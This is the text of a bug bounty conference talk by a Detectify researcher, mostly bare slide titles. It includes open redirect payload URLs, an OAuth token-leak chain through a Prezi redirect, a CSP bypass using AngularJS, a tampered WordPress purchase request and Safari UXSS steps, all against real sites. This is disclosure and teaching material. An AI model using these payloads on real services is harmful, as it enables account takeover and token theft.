Post on 15-Jan-2017
detectifyThe Secret Life of a Bug Bounty Hunter
Frans Rosén @fransrosen
detectify
Frans Rosén"The Swedish Ninja"Knowledge Advisor @detectify ( twitter: @fransrosen )Blog at labs.detectify.comHackerOne #6 @ hackerone.com/thanksHighest paid out bounty on H1: $30k
detectify
Rundown
1. Background2. Approaching a target3. Free money4. Automation5. Browsers6. End
detectify
How it started
detectify
THEN I FREAKED OUT
osv…
detectify
Thailand
detectify
Thailand
detectify
How it actually started
detectify
Approaching a target
detectify
SWFs
detectify
By@nirgoldschlagerand@homakovhttp://homakov.blogspot.se/2013/02/hacking-facebook-with-oauth2-and-chrome.html
http://www.breaksec.com/?p=6039
Facebook Connect
detectify
https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&client_id=298315034451 &response_type=token&redirect_uri=https://www.example.com/login
Facebook Connect
detectify
https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&client_id=298315034451 &response_type=token&redirect_uri=https://xxx.example.com/yyy
No restrictions!
Facebook Connect
detectify
Open Redirect
https://www.victim.com/account/logout?redirect_url=https://example.com\@www.victim.com
https://www.linkedin.com/uas/login?session_redirect=https://example.com%252f@www.linkedin.com%2Fsettings
https://vimeo.com/log_in?redirect=/%09/example.com
https://test6473.zendesk.com/access/login?return_to=//example.com:%252525252f@test6473.zendesk.com/x
https://trello.com/login?returnUrl=/\example.com
detectify
Firefox…
detectify
Firefox…
Chrome:InvalidSafari:Domainnotfound
detectify
Firefox…
Chrome:InvalidSafari:DomainnotfoundFirefox:example.com!
https://www.mozilla.org/en-US/security/advisories/mfsa2015-129/
CVE-2015-7195
detectify
Firefox + Prezi…https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com
detectify
Firefox + Prezi…https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com
HTTP/1.1 301Location: //example.com%0a%23.prezi.com
detectify
Firefox + Prezi…https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com
HTTP/1.1 301Location: //example.com%0a%23.prezi.com
https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&response_type=token&redirect_uri=https://prezi.com/redirect/%3furl=https://example.com%25250a%252523.prezi.com&client_id=298315034451
detectify
Firefox + Prezi…https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com
HTTP/1.1 301Location: //example.com%0a%23.prezi.com
https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&response_type=token&redirect_uri=https://prezi.com/redirect/%3furl=https://example.com%25250a%252523.prezi.com&client_id=298315034451
NOO!:(
detectify
Firefox + Prezi…
detectify
Try the app + proxy
detectify
Note during the walkthrough
Structure of IDs Numeric? ID hashes visible cross accounts?
detectify
Hashed IDs publicly availableUpdate other users / Get user info
ID as hashes, but visible using Google.
No check if user was in another company.
Bounty $3,000
https://hackerone.com/reports/23126
detectify
3rd-party scripts
(get)?(query|url|qs|hash)param
location\.(hash|href|search)\.match
detectify
3rd-party scripts
k.type='text/javascript';var m,src=(m=location.href.match(/\bkxsrc=([^&]+)\b/)) && decodeURIComponent(m[1]);k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl';
detectify
3rd-party scripts
detectify
Paywalls
detectify
CSP bypass
script-src 'self' https://ajax.googleapis.com
https://html5sec.org/minichallenges/3
detectify
CSP bypass
script-src 'self' https://ajax.googleapis.com
https://html5sec.org/minichallenges/3
<script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
detectify
CSP bypass
script-src 'self' https://cdn.mxpnl.com
detectify
CSP bypass
script-src 'self' https://cdn.mxpnl.com
detectify
script-src 'self' https://www.googleadservices.com
CSP bypass
detectify
script-src 'self' https://www.googleadservices.com
CSP bypass
detectify
CSP bypass
detectify
All ze subdomains!
detectify
Subdomains
detectify
Subdomains
detectify
Subdomains
detectify
Free money
detectify
detectify
detectify
detectify
POST /rest/v1.1/me/transactions?http_envelope=1 HTTP/1.1Host: public-api.wordpress.com
cart[blog_id]=44444444
detectify
detectify
detectify
Google XXE
https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/
detectify
Google XXE
detectify
Google XXE
detectify
Google XXE
detectify
Google XXE
detectify
Google XXE
detectify
Square hidden payload
detectify
Square hidden payload
detectify
Automation – Mr Roboto
detectify
Collect
1. Collect all subdomains2. Sort by popularity3. Inject www between pop2 and pop14. Use to scan further + deeper5. Every day. On all targets.
detectify
Subdomains
detectify
Collect
1. Make requests to all domains2. Save both headers + redirects + content timeout 10 curl -sD - "http://$p" -L --insecure --max-time 5 > $xx="streams/stream_pipe_$p"
detectify
Retroactive searching
detectify
detectify
Browser fun
detectify
Safari – the special lil’ snowflake ❄
detectify
Safari 6…
detectify
Safari 6…
detectify
Safari 6…
*pressenter*
detectify
Safari 6…
detectify
Safari 6…
detectify
Safari 6…
detectify
Safari 6…
detectify
Safari 8…
detectify
Safari 8…
detectify
Safari 8…
detectify
Safari 8…
detectify
Safari 8…
detectify
Safari 8…
detectify
Safari 8…
detectify
Safari 8…
detectify
Safari <= 8 Mixed Content UXSS1.Find URL with Mixed Content
2.Use fragment payload to inject clickable link in console
3.SE to get user to open Inspect and click link
4.???
5.PROFI-XSS-T!!!
detectify
Safari 9
Nice!
detectify
Safari 9 Host Header injection
detectify
Safari 9 Host Header injection
detectify
Safari 9 Host Header injection
detectify
Safari 9 Host Header injection
detectify
Safari 9 Host Header injection
detectify
One more thing"Best X ever"
detectify
Best report
"ExploitableSelfXSSatswagger.oculusvr.comusingClickjackingGameandbypassingoffilter"
detectify
Best report
"ExploitableSelfXSSatswagger.oculusvr.comusingClickjackingGameandbypassingoffilter"
detectify
Best response
detectify
Best deal
detectify
Best bug hunting day ever
detectify
Best bug hunting day ever
detectifyThe Secret Life of a Bug Bounty Hunter
Frans Rosén (@fransrosen) – www.detectify.com